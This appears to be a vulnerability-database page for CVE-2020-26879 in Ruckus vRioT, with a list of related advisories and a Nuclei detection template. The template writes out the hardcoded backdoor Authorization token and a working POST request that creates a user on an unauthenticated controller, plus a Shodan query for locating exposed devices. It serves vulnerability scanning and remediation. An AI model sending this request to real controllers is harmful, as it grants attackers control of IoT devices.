| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2020-26879 | 3 Nov 202010:00 | – | circl | |
| Ruckus Networks Ruckus vRioT Trust Management Issues Vulnerability | 27 Oct 202000:00 | – | cnvd | |
| Ruckus IoT Controller Web UI Authentication Bypass (CVE-2020-26879) | 13 Nov 202200:00 | – | checkpoint_advisories | |
| CVE-2020-26879 | 26 Oct 202019:20 | – | cve | |
| CVE-2020-26879 | 26 Oct 202019:20 | – | cvelist | |
| CVE-2020-26879 | 26 Oct 202020:15 | – | nvd | |
| CVE-2020-26879 | 26 Oct 202020:15 | – | osv | |
| Hardcoded credentials | 26 Oct 202020:15 | – | prion | |
| PT-2020-16526 · Ruckus · Ruckus Vriot | 26 Oct 202000:00 | – | ptsecurity | |
| ZuoRAT Can Take Over Widely Used SOHO Routers | 30 Jun 202217:20 | – | threatpost |
id: CVE-2020-26879
info:
name: Ruckus vRioT IoT Controller - Authentication Bypass
author: DhiyaneshDk
severity: critical
description: |
Ruckus vRioT through 1.5.1.0.21 contains an API backdoor caused by a hardcoded token in validate_token.py,letting unauthenticated attackers interact with the API without authentication.
impact: |
Unauthenticated attackers can interact with the API without authentication via a hardcoded token, allowing complete control over the IoT controller and connected devices.
remediation: |
Update to Ruckus vRioT version 1.5.1.0.22 or later.
reference:
- https://adepts.of0x.cc/ruckus-vriot-rce/
- https://adepts.of0x.cc
- https://twitter.com/TheXC3LL
- https://x-c3ll.github.io
- https://github.com/alphaSeclab/sec-daily-2020
- https://nvd.nist.gov/vuln/detail/CVE-2020-26879
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-26879
cwe-id: CWE-798
epss-score: 0.42479
epss-percentile: 0.98536
cpe: cpe:2.3:a:commscope:ruckus_vriot:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: commscope
product: ruckus_vriot
shodan-query: html:"RIoT Controller"
tags: cve,cve2020,ruckus,vriot,iot,api,backdoor,auth-bypass,vkev,vuln
variables:
username: "{{randstr_1}}"
password: "{{randstr_2}}"
http:
- raw:
- |
POST /service/v1/createUser HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Authorization: OlDkR+oocZg=
{"username": "{{username}}", "password": "{{password}}"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"ok": 1}'
- '{"message":'
condition: and
- type: word
part: body
words:
- 'Invalid JSON'
negative: true
- type: status
status:
- 200
# digest: 490a00463044022040d658e2f4eebe5a334c3bf230d81ccf3103cee02f6b13ed78760658ea1357e6022002efba83bec16304db5a909349314f94cda248d0440f9ac5e8af631933b78088:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation